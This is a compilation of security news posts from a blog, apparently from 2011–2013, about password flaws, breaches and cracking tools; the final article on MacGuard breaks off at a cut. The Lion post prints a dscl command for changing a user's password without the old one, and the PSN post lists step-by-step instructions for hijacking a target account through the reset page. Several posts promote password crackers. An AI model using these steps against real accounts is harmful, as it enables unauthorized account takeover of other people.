Vulnerability In OS-X 10.7 Lion Allowing to Change Passwords UN-Authorizedly

A researcher at the Defense in Depth blog has discovered a flaw in Apple's recently released operating system, OS X 10.7 (Lion), which allows passwords to be changed without knowledge of the logged in user's password. The flaw appears related to Apple's move towards a local directory service which has permissions set in an insecure manner. An attacker who has access to a logged in Mac (locally, over VNC/RDC, SSH, etc) is able to change the currently logged in user's password without knowing the existing password as would normally be required:

testmac:~ TestUser$ dscl localhost -passwd /Search/Users/TestUser
New Password:

Historically (in Snow Leopard) you would have needed to enter your existing password first to verify that you in fact are the account holder:

testmac:~ TestUser$ passwd
Changing password for TestUser.
Old Password: -OldPass-
New Password: -NewPass-
Retype New Password: -NewPass-

Not only can a logged in user change their password without knowledge of the existing password, but you can read any other users password hash and make attempts at brute forcing it. Defense in Depth showed how you can parse the hash from openly readable directory information and recover both the hash and the salt used to encrypt the password. This is another great reason to be sure you have secured your Mac properly until Apple makes a fix available. Taking the following steps will help ensure you are protected:

• Use a secure password to prevent brute force attacks against your account using stolen hashes.

• Enable the screensaver and set it to prompt you for your password.

• Disable automatic logon.

• Never leave your Mac logged in and unattended. Use a "Hot Corner" or the Keychain lock to lock your screen.

For more information and to see the researcher blog post click Here

-News Source (NS & Defence Blog)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Vulnerability In OS-X 10.7 Lion Allowing to Change Passwords UN-Authorizedly"https://www.voiceofgreyhat.com/2011/09/vulnerability-in-os-x-107-lion-allowing.html</a>

Famous Framework Metasploit v4.0.0

The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and nop slide generators can be mixed and matched with exploit modules to solve almost any exploit-related task.

New Exploit Modules:

VSFTPD v2.3.4 Backdoor Command Execution
Java RMI Server Insecure Default Configuration Java Code Execution
HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow
Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability
Black Ice Cover Page ActiveX Control Arbitrary File Download
Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability
MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow
Lotus Notes 8.0.x – 8.5.2 FP2 – Autonomy Keyview
RealWin SCADA Server DATAC Login Buffer Overflow
Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow
Iconics GENESIS32 Integer overflow version 9.21.201.01
Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow
Sielco Sistemi Winlog Buffer Overflow
Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow
HP OmniInet.exe Opcode 20 Buffer Overflow
HP OmniInet.exe Opcode 27 Buffer Overflow
Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow
Lotus Notes 8.0.x – 8.5.2 FP2 – Autonomy Keyview

New Post-Exploitation Modules:

Winlogon Lockout Credential Keylogger
Windows Gather Microsoft Outlook Saved Password Extraction
Windows Gather Process Memory Grep
Windows Gather Trillian Password Extractor
Windows PCI Hardware Enumeration
Windows Gather FlashFXP Saved Password Extraction
Windows Gather Local and Domain Controller Account Password Hashes
Windows Gather Nimbuzz Instant Messenger Password Extractor
Windows Gather CoreFTP Saved Password Extraction
Internet Download Manager (IDM) Password Extractor
Windows Gather SmartFTP Saved Password Extraction
Windows Gather Bitcoin wallet.dat
Windows Gather Service Info Enumeration
Windows Gather IPSwitch iMail User Data Enumeration

New Auxiliary Modules:

John the Ripper Password Cracker Fast Mode
Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS
Kaillera 0.86 Server Denial of Service
2Wire Cross-Site Request Forgery Password Reset Vulnerability
SIPDroid Extension Grabber
MSSQL Password Hashdump

Notable Features & Closed Bugs:-

Feature #4982 – Support for custom executable with psexec
Feature #4856 – RegLoadKey and RegUnLoadKey functions for the Meterpreter stdapi
Feature #4578 – Update Nmap XML parsers to support Nokogiri parsing
Feature #4417 – Post exploitation module to harvest OpenSSH credentials
Feature #4015 – Increase test coverage for railgun
Bug #4963 – Rework db_* commands for consistency
Bug #4892 – non-windows meterpreters upload into the wrong filename
Bug #4296 – Meterpreter stdapi registry functions create key if one doesn’t exist
Bug #3565 – framework installer fails on RHEL (postgres taking too long to start)

Armitage integrates with Metasploit 4.0 to:-

Take advantage of the new Meterpreter payload stagers
Crack credentials with the click of a button
Run post modules against multiple hosts
Automatically log all post-exploitation activity
Revision Information:
Framework Revision 13462

Several import parsers were rewritten to use Nokogiri for much faster processing of large import files. Adding to Metasploit’s extensive payload support, Windows and Java Meterpreter now both support staging over HTTP and Windows can use HTTPS. In a similar vein, POSIX Meterpreter is seeing some new development again. It still isn’t perfect nor is it nearly as complete as the Windows version, but many features already work. Java applet signing is now done directly in Ruby, removing the need for a JDK for generating self-signed certificates. The Linux installers now ship with ruby headers, making it possible to install native gems in the Metasploit ruby environment.

Another flexibility improvement comes in the form of a consolidated pcap interface. The pcaprub extension ships with the Linux installers as of this release and support for Windows will come soon. Modules that used Racket for generating raw packets have been converted to Packetfu, which provides a smoother API for modules to capture and inject packets.

To download Metasploit Framework v4.0.0 Click Here

For more information abous MSF click here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Famous Framework Metasploit v4.0.0"https://www.voiceofgreyhat.com/2011/08/famous-framework-metasploit-v400.html</a>

Ekoparty Conference: Stealth Password Cracking Vulnerability Found in Oracle Database

Ekoparty Conference: Stealth Password Cracking Vulnerability Found in Oracle Database

Researchers unveiled serious vulnerability in the authentication protocol used by some Oracle databases, a flaw that could enable a remote attacker to brute-force a token provided by the server prior to authentication and determine a user's password. The attacker could then log on as an authenticated user and take unauthorized actions on the database. The vulnerability exists in Oracle Database 11g Releases 1 and 2 and is caused by a problem with the way the authentication protocol protects session keys when users try to log in. The first step in the authentication process when a client contacts the database server is for the server to send a session key back to the client, along with a salt. The vulnerability enables an attacker to link a specific session key with a specific password hash. The researcher who discovered the bug named Esteban Martinez Fayó has also released a tool that can crack some simple passwords in about five hours on a normal PC.  Fayó is a security specialist of AppSec Inc, he demonstrated his findings at the Ekoparty conference which is currently taking place in Buenos Aires. 

According to Esteban Martinez Fayo "This Session Key is a random value that the server generates and sends as the initial step in the authentication process, before the authentication has been completed.  This is the reason why this attack can be done remotely without the need of authentication and also, as the attacker can close the connection once the Session Key has been sent, there is no failed login attempt recorded in the server because the authentication is never completed."  He also staid "Once the attacker has a Session Key and a Salt (which is also sent by the server along with the session key), the attacker can perform a brute force attack on the session key by trying millions of passwords per second until the correct one is found.  This is very similar to a SHA-1 password hash cracking.  Rainbow tables can’ t be used because there is a Salt used for password hash generation, but advanced hardware can be used, like GPUs combined with advanced techniques like Dictionary hybrid attacks, which can make the cracking process much more efficient."  

"Basically, I discovered that not all failed login attempts were recorded by the database.  Looking closer at the issue, I located the problem in the way that one of the components of the logon protocol, the Session Key, was protected.  I noticed that, in a certain way, the Session Key was leaking information about the password hash," he added 

Although Oracle closed the hole with the 11.2.0.3 patch set, which introduced the new version 12 of the protocol in mid-2011, Fayó said that there has been no fix for versions 11.1 and 11.2 of the database because the update was never included in any of Oracle's regular "critical patch updates". The researcher explained that unless administrators activate the new protocol manually, the database will continue to use the vulnerable version 11.2 protocol. The vulnerability is in a widely deployed product and is easy to exploit, Fayo said he considers it to be quite dangerous. "The Oracle stealth password cracking vulnerability is a critical one.  There are many components to affirm this: It is easy to exploit, it doesn’t leave any trace in the database server and it resides in an essential component of the logon protocol," he said.

"It is very simple to exploit.  The attacker just needs to send a few network packets or use a standard Oracle client to get a Session Key and Salt for a particular user.  Then, an attack similar to that of cracking SHA-1 password hash can be performed. I developed a proof-of-concept tool that shows that it is possible to crack an 8 characters long lower case alphabetic password in approximately 5 hours using standard CPUs."

-Source (Threat Post)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Ekoparty Conference: Stealth Password Cracking Vulnerability Found in Oracle Database"https://www.voiceofgreyhat.com/2012/09/Stealth-Password-Cracking-Vulnerability-in-Oracle.html</a>

MysqlPasswordAuditor- Mysql Password Recovery & Auditing Tool

MysqlPasswordAuditor- Mysql Password Recovery & Auditing Tool

We have good new for those who are little volatile in nature, such as who used to forget his passwords and put himself or even his system, database etc in danger. Those who intend to lose or forgot our Mysql database password need not to worry beacuse now you have MysqlPasswordAuditor which can help you in recovering it easily. It can also help you to audit Mysql database server setup in an corporate environment by discovering the weak password configurations. This makes it one of the must have tool for IT administrators & Penetration Testers.

Brief About MysqlPasswordAuditor:- 

MysqlPasswordAuditor is very easy to use with the simple dictionary based password recovery method. By default it includes small password list file, however you can find more password dictionary files at OpenWall collection. You can also use tools like Crunch, Cupp to generate custom password list files on your own and then use it with MysqlPasswordAuditor. 

Features:-

• Free and Simple software to Recover/Audit Mysql Password.

• Very useful for IT administrators & Penetration Testers

• Dictionary based Password Recovery method

• Detailed statistics such as tested passwords, elapsed time, progress bar is displayed during Audit operation.

• Simple, easy to use GUI interface

• Integrated Installer for local Installation & Uninstallation.

To Download  MysqlPasswordAuditor Click Here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">MysqlPasswordAuditor- Mysql Password Recovery & Auditing Tool"https://www.voiceofgreyhat.com/2012/01/mysqlpasswordauditor-mysql-password.html</a>

Microsoft Introduced Picture Passwords For Windows 8

The experience of signing in to your PC with touch has traditionally been a cumbersome one. In a world with increasingly strict password requirements—with numbers, symbols, and capitalization—it can take upwards of 30 seconds to enter a long, complex password on a touch keyboard. To get rid of all these stuffs Microsoft is introducing a new technology. Using that you can login ti your Windows 8 PC with a picture password. Likely designed for touchscreens, users are prompted with a familiar picture of their choice and asked to make a series of finger gestures on the screen to setup password protection. Microsoft recommends that users pick at least three gestures and can choose between a circle, a tap and a line drawn between two points. When a user logs into a Windows 8 machine using Picture Password, they simply have to replicate the correct placement, order and direction of all gestures.

Microsoft dictates the set of three different gestures after research showed that login time was cut from 17 seconds using free form gestures to 4 seconds using preset gestures. Users don’t have to be 100 percent accurate with the placement of the gestures as the image is broken up into a grid and the combination of replicating the three gestures is assigned a percentage score each time the login process is attempted through an algorithm. If the score is 90 percent or above, the user gains access to the system. Microsoft also outlined how security is increased with the Picture Password method. For instance, if a user creates a six-character text password with at least one uppercase letter and one number, there would be 7 billion combinations available. However, if a user creates a picture password with six gestures using only taps, that number increases to 1.3 trillion combinations. Even further, reducing the amount of gestures to five and including at least one circle and one line gesture within the group increases the number of combinations to approximately 70 trillion. The Windows engineering team has just started building the Picture Password functionality and hopes to include it within the final version of Windows 8 likely released during 2012.

You can find more information about this article on the Windows 8 Developer Blog 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Microsoft Introduced Picture Passwords For Windows 8"https://www.voiceofgreyhat.com/2011/12/microsoft-introduced-picture-passwords.html</a>

PSN Network Password Recovery Exploited

Patrick Seybold, Sr. Direct of Corporate Communications and Social Media, has released a statement on the PlayStation.Blog regarding this situation. Seybold clarifies, it was not a “hack”, but a URL exploit that Sony has now fixed. See the full statement (and original article) after the jump.
Here’s the official statement:

We temporarily took down the PSN and Qriocity password reset page. Contrary to some reports, there was no hack involved. In the process of resetting of passwords there was a URL exploit that we have subsequently fixed.
Consumers who haven’t reset their passwords for PSN are still encouraged to do so directly on their PS3. Otherwise, they can continue to do so via the website as soon as we bring that site back up.

[Original Article] The Password Recovery program that has been implemented by Sony since the PSN’s return has been moving along nicely. With such a huge influx of people requesting their information through their secure email connection, as opposed to on a PS3, Sony stated that the process would take a little longer than originally estimated. It may be even longer now. While the hack that shut down the PSN was quite “sophisticated,” a small little exploit seems to have been discovered to change the passwords again.
But if you’re worried that your PS3 will go silent once again, fret not. This password exploit seems to only be affecting various web-based Sony services. An official community moderator on the EU PlayStation forums have indicated that several sites are offline, including PlayStation.com, the forums, the Blog, Qriocity.com, and others. The login functions for these services are currently unavailable. For the time being all PlayStation Network activity is still online for PS3 and PSP users. So you don’t have to worry about that. But what DID happen?
If you wanted to reset your PSN password from your computer, you were sent an email with a unique URL to match your account. The entire process is actually fairly primitive. Note that it won’t work right now, as login services are offline.

The prodecure is as follows:
1) Navigate to : https://store.playstation.com/accounts/reset/resetPassword.action?token (this is normally, via email, https://store.playstation.com/accounts/reset/resetPassword.action?token=YYYYYYYYYYYYYYYYYYYYYYYY with the y’s being a unique token) – do not enter the code at this point.
2) Open a new tab in firefox, and go to fr.playstation.com (other pages will work too most likely), and click Login (Connexion)
3) Click Recover password
4) Enter the email and date of birth of the target account
5) Click continue, then on the confirmation page, click “Reset using E-mail”
6) Switch back to the original tab, and enter the code, then click continue
7) You will now be asked to enter a new password for the target account

Fortunately, if your account WAS compromised, you should have received an email that said something along the lines of “Thank you for changing your password, if you were unaware of this change please contact Sony,” or something to that effect. While this method is as effective as it is simple, it would take a lot of time to physically access any large number of accounts. It sounds like Sony found out about this and shut off its only access point fairly quickly. Only one more question left:
When will it just end?

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">PSN Network Password Recovery Exploited"https://www.voiceofgreyhat.com/2011/05/psn-network-password-recovery-exploited.html</a>

Webmail gets hacked, corporate passwords exposed

This week, one of our C-level executives suffered a personal security incident that spilled over to the workplace. Here's what happened.

The executive's Yahoo email password was compromised, which she learned after hearing from friends who told her that they had received messages from her requesting money to deal with a crisis. You've probably heard similar stories, but whoever hacked the executive's email was a bit more clever than the average cybercrook. One friend was suspicious of the request and asked for verification of the executive's identity. Most email hijackers would probably give up and move on to another victim at that point, but this hacker had sifted through the executive's emails and learned enough about her family, vacations and health issues to trick the friend and dupe her into wiring the money.

Naturally, the executive had used her Yahoo Mail account for a variety of activities, including setting up accounts with her bank, her brokerage, an airline and various shopping sites. The Yahoo account had received emails containing clear-text passwords when she had forgotten them. Worse, she often used the same password for multiple accounts.

I advised her to abandon the email account and to contact all of her friends and let them know that they should disregard any mail from that address. But that action, or simply changing the password, probably wouldn't be enough to stem the damage. Most identity thieves will download all the email from a compromised account, as well as data such as calendars and contact lists, to a local computer. This is quite simple, since many webmail clients allow customers to use more feature-rich email clients such as Microsoft Outlook to download email. So even if the account were shut down or the password changed, the hacker would probably still have all of its contents.

Because the compromised content could not be safeguarded, I also told her to file a police report; contact all banks, credit card companies, brokerages and other organizations with which she had done business online; file a fraud alert with the major credit agencies; sign up for a credit-monitoring service; and obtain a new email address and update all of her accounts with that address. I also warned her to refrain from using any PCs, including her home PC, until we could verify their integrity, since we still didn't know how her password had been compromised.

Dangerous Habit

In the course of our conversation, I learned that this incident had implications for the company. You see, we have increased our use of software as a service to the point that we now use more SaaS offerings than on-premises applications. Some might see this as an achievement. I see it as a security nightmare.

As I've explained in past articles, most SaaS vendors have focused more on functionality and accessibility than on security. This incident is a perfect example of how that approach can lead to problems. The executive had a habit of forgetting her passwords for SaaS applications, and she gave me a list of seven SaaS apps that had sent password reset notices to her hacked email account -- in clear, unencrypted text!

Fortunately, none of the data used with these particular apps was extremely sensitive. But she had used her domain password for all of the applications. This meant we had to change her domain password and then log in to all the other applications -- about 15 altogether -- that were not synchronized with Active Directory or configured for single sign-on.

Needless to say, this was not a good day for this executive. But on a positive note, I did get a sponsor for my security awareness and training program.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Webmail gets hacked, corporate passwords exposed"https://www.voiceofgreyhat.com/2011/05/webmail-gets-hacked-corporate-passwords.html</a>

Microsoft Fixed The Password Reset Vulnerability in Hotmail

Microsoft Fixed The Password Reset Vulnerability in Hotmail  

Recent security issue I mean the 0-day vulnerability on hotmail, which was allowing users to reset passwords remotely has been fixed. The vulnerability existed in Hotmail's password reset feature. Hackers were able to use a Firefox add-on called Tamper Data to intercept the outgoing HTTP request following a password reset request and modify the data, locking out the account holder and gaining access to their inbox.

 Microsoft security team said in a tweet on Friday that it had "addressed a reset function incident to help protect Hotmail customers", and that no further action was needed on the customer's part. "The vulnerability allows an attacker to reset the Hotmail/MSN password with attacker chosen values. Remote attackers can bypass the password recovery service to setup a new password and bypass in place protections (token based) … Successful exploitation results in unauthorised MSN or Hotmail account access," the researchers wrote on Thursday. Although public disclosure only came on Thursday, reports had already been circulating of the flaw's exploitation.  The WhiteC0de blog noted a week ago that the exploit had "spread like wildfire across the hacking community", with victims losing money and, in some cases, valuable usernames. The Whitec0de report also noted rumours of a separate "critical vulnerability" in Hotmail that is also being exploited by hackers, but stressed that there was no evidence yet of these rumours' veracity.

-Source (ZDnet)  

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Microsoft Fixed The Password Reset Vulnerability in Hotmail"https://www.voiceofgreyhat.com/2012/05/microsoft-fixed-password-reset.html</a>

Hash Code Cracker V 1.2 Released ~ Password Cracking Tool from BreakTheSecurity

BreakTheSecurity released the Hash Code Cracker Version 1.2.
Description:-
This password cracker is developed for PenTesters and Ethical hackers.
Please Use this software for legal purposes(Testing the Password
Strength).

Features:-
This software will crack the MD5, SHA1,NTLM(Windows Password) hash codes. Supports All platforms(windows XP/7,Linux,..).

V1.2 Change log:-
Included Online cracking Support

Minimum Requirements:-
Java Runtime Environment: JRE 1.6 should be installed.(you can get
it from oracle.com)

How to Run the Application:-
Download the .zip file and extract.
Extract the zip file.
Open the Terminal or command prompt.
Navigate to the path of Extracted zip file (i mean HashCodeCracker
Folder) in Terminal/CMD.
Type this command "java -jar HashCodeCracker.jar".
Now the application will run.

To download Hash Code Cracker V 1.2 Click Here

HashCodeCracker v1.2 Video Tutorials Are also Available:-

How to Run Hash Code Cracker Jar using Command Prompt~Password Cracking

How to Crack the Password using Online Cracker Hash Code Cracker v1.2

How to start Hash Code Cracker Jar with double Click~Password Cracking

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Hash Code Cracker V 1.2 Released ~ Password Cracking Tool from BreakTheSecurity"https://www.voiceofgreyhat.com/2011/10/hash-code-cracker-v-12-released.html</a>

Thousands of Sources in Written-Password (SNAFU) Exposed By WikiLeaks

The cone of silence over WikiLeaks' thousands of sources - many of whose lives are at risk if identified - has been shattered, all thanks to the most mundane, all-too-human security screwup imaginable.

To wit: WikiLeaks founder Julian Assange wrote down the password on a piece of paper, and then forgot to change it later. The security breach has thrown open the doors to WikiLeaks' entire archive of 251,000 secret U.S. diplomatic cables.

To the horror of the media partners it has worked with in the past to carefully redact the documents - The Guardian, The New York Times, El Pais, Der Spiegel and Le Monde - WikiLeaks has published its entire archive, unredacted, putting in danger several thousands of people whom the U.S. has tagged as being at risk if exposed. The documents also cite more than 150 whistle blowers.

"We deplore the decision of WikiLeaks to publish the unredacted state department cables, which may put sources at risk," the organizations said in a joint statement. 

"Our previous dealings with WikiLeaks were on the clear basis that we would only publish cables which had been subjected to a thorough joint editing and clearance process. We will continue to defend our previous collaborative publishing endeavour. We cannot defend the needless publication of the complete data – indeed, we are united in condemning it."

The media partners made it clear that this time, with this move, Assange got no help from them. "The decision to publish by Julian Assange was his, and his alone," they said in the statement. Der Spiegel has chronicled the archive’s publishing, tracing it back to a meeting between Assange and David Leigh of The Guardian.

According to the account, as the British journalist recounts in his book "Inside Julian Assange's War on Secrecy", Leigh and Assange at one point sat down to discuss how Assange would provide Leigh with a file including all of the diplomatic dispatches received by WikiLeaks.

According to Der Spiegel, Assange placed the file on a server and wrote part of the password on a slip of paper. To make it work, one had to complete the list of characters with a certain word.

Can you remember it? Assange asked. Of course, Leigh said.

"At the time, Daniel Domscheit-Berg, who later founded the site OpenLeaks, was the German spokesman for WikiLeaks. When he and others undertook repairs on the WikiLeaks server, he took a dataset off the server which contained all manner of files and information that had been provided to WikiLeaks. What he apparently didn't know at the time, however, was that the dataset included the complete collection of diplomatic dispatches hidden in a difficult-to-find sub-folder," according to Der Spiegel.

With the dataset in the hands of Domscheit-Berg, Leigh went on to describe his meeting with Assange in his book. In the book, however, he included not only the portion of the password on the slip of paper, but also the part he had been asked to commit to memory.

What followed included feuding between Domscheit-Berg and Assange, attempts to prove that Assange wasn’t trustworthy, and the eventual disclosure that not only was the entire dataset circulating, but that the password could be found in Leigh's book.

At this point, fingerpointing is rampant. WikiLeaks' Twitter feed blames The Guardian. The Guardian is protesting its innocence, putting out a statement claiming that it had been told the password was only temporary.

The U.S. Embassy in London and the U.S. State Department were notified of the possible publication on August 25 to enable officials to warn the named informants. Hopefully, this has given them enough time to remove themselves from harm.

Whether that is possible for all the sources who’ve been put in harm's way is an open question.

But one thing is certain: The platforms to which whistleblowers have hitherto brought their leaks are compromised. They are as riddled with security holes, as flailing with common human weaknesses, as the most ridiculed home user running an unsecured wireless network and the most inept office worker writing down his password on a Post-It note.

Let us hope that this carelessness, this breathtaking lapse in security hygiene, leads to no loss of life.

-News Source (Wikileaks & Naked Security)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Thousands of Sources in Written-Password (SNAFU) Exposed By WikiLeaks"https://www.voiceofgreyhat.com/2011/09/thousands-of-sources-in-written.html</a>

Security Breach Australia's Largest Telecom "TELSTRA" Forces 35K Users To Change Password

Security Breach Australia's Largest Telecom "TELSTRA" Forces 35K Users To Change Password 

TELSTRA, Australia's largest telecommunication company has been forced to change 35,000 users' passwords on its  gaming websites GameArena and Games Shop after a hacking attack. A statement issued by Telstra on Thursday morning warned that information such as user names, email addresses and passwords may have been stolen. 

"We have reset the passwords of GameArena and Games Shop customers, after the sites were victims of a hacking attack," the statement said. "While your password for access to the site has been changed, and the new password has been emailed to you, we encourage you to change it at any other site where you might have used the same password." No financial or credit card details were kept on the sites. Telstra said the site is operated by a third party, so other Telstra customers should not be affected. "We will contact affected customers, with their new password, as soon as possible," Telstra added.

In 2011 we have seen similar attacks when cyber criminals targeted MapleStory Players & Stolen personal details of 13 million players, same things happened to Square Enix server hacked which leads more than 1.8 million accounts compromised. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Security Breach Australia's Largest Telecom "TELSTRA" Forces 35K Users To Change Password"https://www.voiceofgreyhat.com/2012/05/security-breach-australias-largest.html</a>

Windows 8 Adds Built In Synchronized Password Manager

Microsoft hopes to simplify the task of managing multiple passwords with the next major release of its popular operating system. According to the Windows 8 blog, a new feature will allow users to put an unlimited number of individual passwords behind one master password, and have them synchronize across all other Windows 8 machines they use.

Since the Live ID is the only password you'll need to know, you can set complex and unique passwords for multiple websites -- so if one site gets hacked and your credentials are stolen from their servers, you entire digital lives won't be at risk. Windows 8 will automatically enter your login information when visiting a saved website. This is similar to what services like 1Password and LastPass currently offer.

If your Windows Live ID password is somehow lost or stolen, there will be a number of safety features in Windows 8 designed to detect compromise and limit account usage until you can successfully recover access to it. For instance, users can request a confirmation code be sent to a mobile phone number or email address registered with Windows Live. Also, even if your credentials are compromised, you will still have full access to your PC since Windows 8 will accept the last password successfully used to log onto the system.

Microsoft says it will also offer a a number of "convenience" sign-in methods such as Picture Password and biometrics -- they didn't go into details but promised to do so in a future update. 

Video Demostration By Microsoft:-

For more information and further details Click Here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Windows 8 Adds Built In Synchronized Password Manager"https://www.voiceofgreyhat.com/2011/12/windows-8-adds-built-in-synchronized.html</a>

Drupal.org Hacked ! More Than 967,000 Registered User Details Compromised

Drupal.org Hacked ! More Than 967,000 Registered User Details Compromised 

Drupal, one of the most famous and widely used open-source content management framework have fallen victim to cyber criminals. The Drupal Security Team and Infrastructure Team has discovered unauthorized access to account information on the official Drupal website and another site called groups.drupal.org. This security breach has exposed user names, country, and email addresses along with hashed passwords of more than 967,000 registered users on the Drupal.org. But still a matter of relief is that the breach failed to infiltrate the credit card details which was stored on the same server. According to security release unauthorized access was made via third-party software installed on the Drupal.org server infrastructure, and was not the result of a vulnerability within Drupal itself. Drupal team have worked with the vendor to confirm it is a known vulnerability and has been publicly disclosed. They are still investigating and will share more detail when it is appropriate. Upon discovering the files during a security audit, the security team has already shut down the association.drupal.org website to mitigate any possible ongoing security issues related to the files. The Drupal Security Team then began forensic evaluations and discovered that user account information had been accessed via this vulnerability. The suspicious files may have exposed profile information like username, email address, hashed password, and country. In addition to resetting your password on Drupal.org, it is also recommending a number of measures (below) for further protection of your information, including, among others, changing or resetting passwords on other sites where you may use similar passwords. 

As a precautionary measure of the said security breach, Drupal Security Team has reset all Drupal.org account holder passwords and are requiring users to reset their passwords at their next login attempt. A user password can be changed at any time by taking the following steps. 

1. Go to https://drupal.org/user/password 
2. Enter your username or email address. 
3. Check your email and follow the link to enter a new password. It can take up to 15 minutes for the password reset email to arrive. If you do not receive the e-mail within 15 minutes, make sure to check your spam folder as well.

Counter Measures that Drupal has Taken to avoid such mishap is something followed- as attacks on high-profile sites (regardless of the software they are running) are common, Drupal strive to continuously improve the security of all Drupal.org sites. To that end, Drupal have taken the following steps to secure the Drupal.org infrastructure:

• Staff at the OSU Open Source Lab (where Drupal.org is hosted) and the Drupal.org infrastructure teams rebuilt production, staging, and development webheads and GRSEC secure kernels were added to most servers
• Drupal is scanning and have not found any additional malicious or dangerous files and making scanning a routine job in their process
• There are many subsites on Drupal.org including older sites for specific events. Drupal created static archives of those sites.

This security breach of Drupal which affected more than 967,000 users is giving us a remind of the decent history of breach where we have seen a slew of attacks against the following sites: Scribd, Guild Wars 2, Gamigo, Blizzard, Yahoo, LinkedIn, eHarmony, Formspring, Android Forums, Gamigo,  Nvidia,Blizzard, Philips, Zynga, VMWare, Adobe,  Twitter  New York Times, Apple and so on. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Drupal.org Hacked ! More Than 967,000 Registered User Details Compromised "https://www.voiceofgreyhat.com/2013/06/Drupal.org-Hacked-967000-User-at-Risk.html</a>

Mac OS X Lion Login Password Vulnerability

A password recovery company has advised users of the Mac OS X Lion to disable the ‘automatic login’ feature of the operating system from Apple (NASDAQ:AAPL) due to a vulnerability that was discovered recently.

The vulnerability of the recently released Mac OS X Lion reportedly exposed the login passwords whenever the Mac is in sleep mode or is locked according to Passware, which provides password recovery software applications to law enforcement organizations. The same issue also affects the earlier version of the OS from Apple, the Snow Leopard.

The company indicated that it was necessary for users of the Mac OS X Lion to connect with the FireWire port of the Mac for them to retrieve the password through direct memory access. Sales of the latest OS from Apple started a week ago at the App Store with a price tag of $30. Apple has pointed out that the Mac OS X Lion provides numerous new features.

Fortunately this issue can be easily resolved by users when they disable the automatic login feature on the Mac OS X Lion. The users can also opt to shut down the computers since the passwords will not be saved in the memory once the computers are turned off. The FireWire port can also be disabled by the users to guard against this vulnerability on the Mac OS X Lion.

The company also indicated that its newest offering, the Passware Kit Forensic will be able to deal with the vulnerability on the Mac OS X Lion since the software will reportedly recover the login password.

When the automatic login feature is disabled, the computer will be secured even if the passwords are recoverable while the Mac is in sleep mode. With the automatic login feature in the Mac OS X Lion, anyone who works on the computer can access the device.

Users will have to type in their password into the computer using their profile in order to disable the automatic login feature of the Mac OS X Lion. Passware has indicated that it has already used the same system of accessing apparently secured data as ut was able to decrypt some hard drives that were encrypted using TrueCrypt and BitLocker.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Mac OS X Lion Login Password Vulnerability"https://www.voiceofgreyhat.com/2011/07/mac-os-x-lion-login-password.html</a>

Hacking can now be made useless

Hackers can now be discouraged from hacking into user accounts despite having access to passwords, reveals a new Labanese research.
According to the Key-Pattern Analysis (KPA), a new approach developed by the American University of Beirut, the password stolen by hackers can become ineffective. KPA is an attempt to scrutinise the speed with which a user taps the keys as well as measuring the gaps between keystrokes, the beat of their typing.
The result can be a biometric profile of the way individual users type in their password. If the biometric profile does not match the user, then the password fails even if it is "correct," reports the International Journal of Internet Technology and Secured Transactions.
However, Ravel Jabbour, Wes Masri and Ali El-Hajj at the university point out that a modified keyboard would be inconvenient for an organization or individual, according to a Beruit statement.
So, the team instead has incorporated "intra" timing that measures how long each key remains pressed, which gives them the beat of the typing and is a much more robust parameter.
The programme gathers information about how the users type in their password by recording the electronic signals from a standard keyboard as keys are pressed and released.
The programme then compares the pattern of the password typed with a pre-stored pattern recorded when the account is initially setup.
Users would be expected to repeatedly type their password at the log-in registration stage to record a reproducible typing pattern for permitting a log-in. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Hacking can now be made useless"https://www.voiceofgreyhat.com/2011/05/hacking-can-now-be-made-useless.html</a>

New MacGuard Phishing Attack Bypasses Mac OS X Password Requirement

A new MacDefender variant targeting Apple (NSDQ:AAPL)'s Mac OS X platform now can circumvent the password requirement to install fake antivirus software onto victims' computers.

The latest version of the fake antivirus MacDefender, known as MacGuard, was first detected by researchers at Mac security firm Intego. Unlike other versions of Mac Defender, MacGuard bypasses password requirements, and automatically installs without any user intervention.

Intego researchers first detected a fake antivirus attack with Mac Defender targeting the Mac OS X platform May 2. Like other fake antivirus schemes, known as scareware, the virus appeared on users' Macs via a pop-up or an infected link, offering a phony virus scan. The fake scan would inevitably claim to find a virus, and then would trick the user into submitting credit card numbers in exchange for bogus antivirus software.

Since it was first discovered earlier this month, alternately named versions of the MacDefender virus have emerged, such as MacProtector, and MacSecurity. Up until now, the different version have been the same application but with different names.

However, the new MacGuard, which is spread via SEO poisoning attacks, functions slightly differently. Initially, the installation package, known as avSetup.pkg, is downloaded automatically when a user visits a malicious or infected site, typically via an SEO poisoning attack.

If Safari's "Open safe files after downloading" feature is checked, the payload will open Apple's Installer and the user will see a standard installation screen, Intego researchers said. If not, users could see a downloaded ZIP archive and feel inclined to double click, which would also launch the Mac OS Installer.

The package then installs a downloader, dubbed avRunner, which then launches automatically while the installation package deletes itself from the user's Mac, essentially erasing its tracks.

